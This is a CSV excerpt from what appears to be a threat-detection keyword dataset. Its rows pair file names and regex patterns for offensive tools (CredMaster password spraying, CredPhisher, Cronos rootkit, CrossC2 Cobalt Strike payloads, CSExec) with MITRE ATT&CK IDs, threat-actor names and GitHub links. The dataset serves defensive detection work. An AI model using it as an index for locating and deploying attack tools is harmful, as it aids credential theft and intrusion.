"*/creditcards.py*",".{0,1000}\/creditcards\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","6256"
"*/CredMaster.git*",".{0,1000}\/CredMaster\.git.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6257"
"*/credmaster.py*",".{0,1000}\/credmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6258"
"*/credmaster.txt*",".{0,1000}\/credmaster\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#linux","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6259"
"*/CredMaster-master.zip*",".{0,1000}\/CredMaster\-master\.zip.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6260"
"*/credmaster-success.txt*",".{0,1000}\/credmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#linux","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6261"
"*/credmaster-validusers.txt*",".{0,1000}\/credmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#linux","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6262"
"*/CredPhisher.exe*",".{0,1000}\/CredPhisher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6263"
"*/CredPhisher.exe*",".{0,1000}\/CredPhisher\.exe.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","1","N/A","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","6264"
"*/CredPhisher/*",".{0,1000}\/CredPhisher\/.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","6265"
"*/CredPrompt.exe*",".{0,1000}\/CredPrompt\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","6266"
"*/CredPrompt/credprompt.c*",".{0,1000}\/CredPrompt\/credprompt\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","6267"
"*/creds-*/creds.zip*",".{0,1000}\/creds\-.{0,1000}\/creds\.zip.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","N/A","10","6048","726","2025-04-15T13:13:19Z","2021-01-01T19:02:36Z","6268"
"*/creds-summary.nse*",".{0,1000}\/creds\-summary\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6269"
"*/crlfinjection.txt*",".{0,1000}\/crlfinjection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","6270"
"*/Cronos-Rootkit*",".{0,1000}\/Cronos\-Rootkit.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","6276"
"*/Cronos-Rootkit/*",".{0,1000}\/Cronos\-Rootkit\/.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","6277"
"*/Cronos-x64.zip*",".{0,1000}\/Cronos\-x64\.zip.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","6278"
"*/CrossC2.*",".{0,1000}\/CrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","6279"
"*/CrossC2/*",".{0,1000}\/CrossC2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","6280"
"*/CrossC2Kit*",".{0,1000}\/CrossC2Kit.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","6281"
"*/CrossC2Kit/*",".{0,1000}\/CrossC2Kit\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","6282"
"*/CrossC2-test*",".{0,1000}\/CrossC2\-test.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","6283"
"*/CrossNet-Beta/*",".{0,1000}\/CrossNet\-Beta\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","6284"
"*/crunch-wordlist/*",".{0,1000}\/crunch\-wordlist\/.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6298"
"*/crypt0p3g/*",".{0,1000}\/crypt0p3g\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","6299"
"*/cryptomining.git*",".{0,1000}\/cryptomining\.git.{0,1000}","offensive_tool_keyword","cryptomining","A Linux Cyptomining malware","T1496","TA0009","N/A","N/A","Cryptomining","https://github.com/tarcisio-marinho/cryptomining","1","1","#linux","N/A","7","1","36","15","2023-05-05T02:42:59Z","2018-04-07T03:59:52Z","6300"
"*/crytox.hta*",".{0,1000}\/crytox\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","6301"
"*/cs2modrewrite/*",".{0,1000}\/cs2modrewrite\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","6302"
"*/CS-BOFs/*",".{0,1000}\/CS\-BOFs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","6303"
"*/csexec.exe*",".{0,1000}\/csexec\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6304"
"*/CSExec.git*",".{0,1000}\/CSExec\.git.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6305"
"*/CSExec.py*",".{0,1000}\/CSExec\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","6306"
